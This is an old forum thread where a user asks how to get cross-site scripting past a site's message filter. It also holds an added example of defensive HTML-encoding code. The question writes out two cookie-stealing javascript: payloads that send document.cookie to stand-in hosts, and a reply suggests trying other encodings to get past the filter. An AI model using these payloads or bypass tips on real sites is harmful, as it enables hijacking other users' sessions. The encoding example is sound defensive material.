How to use XSS in this case?
Posted by: jordy
Date: November 21, 2011 09:50AM

Hi,

I can send messages to other people and it is shown in a div:

<div id="content">
<script>
<script type="text/javascript">
<h1 id="loadingContent" class="loadedHeaderContent" onclick="javascript:ajaxpage('/pages/messages_s.php?id=12');" onmouseout="this.style.color='#3c241a';" onmouseover="this.style.color='#D29257';">Read message</h1>
<div style="margin-top:30px; font-family:Palatino Linotype, Book Antiqua, Palatino, serif;">
<div class="notificationTop">
<div class="notificationMiddle" style="width:500px; _width:600px;">[[!!MESSAGE!!]]</div>
<div class="notificationBottom"></div>
</div>
</div>


where [[!!MESSAGE!!]] is the message I sent. If I try to send this message:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie=' document.cookie;">Click here!</a>

I can see in the source code the following:
&lt;a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie=' document.cookie;"&gt;Click here!&lt;/a&gt;

So that doesn't work.

But if I send this: javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));

I can see in the source code this:
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));

So that means that the characters are not escaped. How can I bypass this filter with a link to a website?

Thanks!

Re: How to use XSS in this case?
Posted by: Anonymous User
Date: January 09, 2012 08:20AM

Those specific characters may not be escaped, but the greater than and less than ">" "<" that you were using to create the href tag are being sanitized.

You're basically just placing your string in as text outside of tags.

Have you tried any other methods of encoding your string?

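The sanitising the reply describes, as an added example that is not code from this thread or from the site being discussed: a text-context HTML encoder applied to the notification template quoted in the question, run over constructed sample messages (the example.invalid hostname is a placeholder).

```javascript
// Added example, not code from the thread: the encoding the reply describes.
// The message is HTML-entity-encoded before it is placed into the text-node
// slot of the notification template, so '<' and '>' can no longer open a tag
// and the whole string is rendered literally as text.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode for an HTML text-node context (between tags). '&' is in the set so
// an already-encoded entity in the input is not silently passed through.
function escapeHtmlText(s) {
  return String(s).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// The template from the post; [[!!MESSAGE!!]] sits in text-node position.
const TEMPLATE =
  '<div class="notificationMiddle" style="width:500px; _width:600px;">[[!!MESSAGE!!]]</div>';

// A function replacement is used on purpose: with a plain string replacement,
// sequences such as "$&" in the message would be expanded by String.replace.
function renderMessage(message) {
  return TEMPLATE.replace('[[!!MESSAGE!!]]', () => escapeHtmlText(message));
}

// Count markup tags in rendered HTML: a '<' followed by a letter or '/'.
// The template alone contributes exactly two, <div ...> and </div>.
function countTags(html) {
  return (html.match(/<\/?[a-zA-Z]/g) || []).length;
}

// Constructed sample messages shaped like the two in the question.
const LINK_MESSAGE = '<a href="https://example.invalid/">Click here!</a>';
const PLAIN_MESSAGE = "javascript:document.location='https://example.invalid/'";

// For both messages the tag count stays at the template's own two: the first
// shows up as &lt;a href=...&gt;, the second is an inert text node, since a
// bare javascript: string outside any href or event attribute is just text.
function demo() {
  const link = renderMessage(LINK_MESSAGE);
  const plain = renderMessage(PLAIN_MESSAGE);
  return { link, plain, linkTags: countTags(link), plainTags: countTags(plain) };
}
```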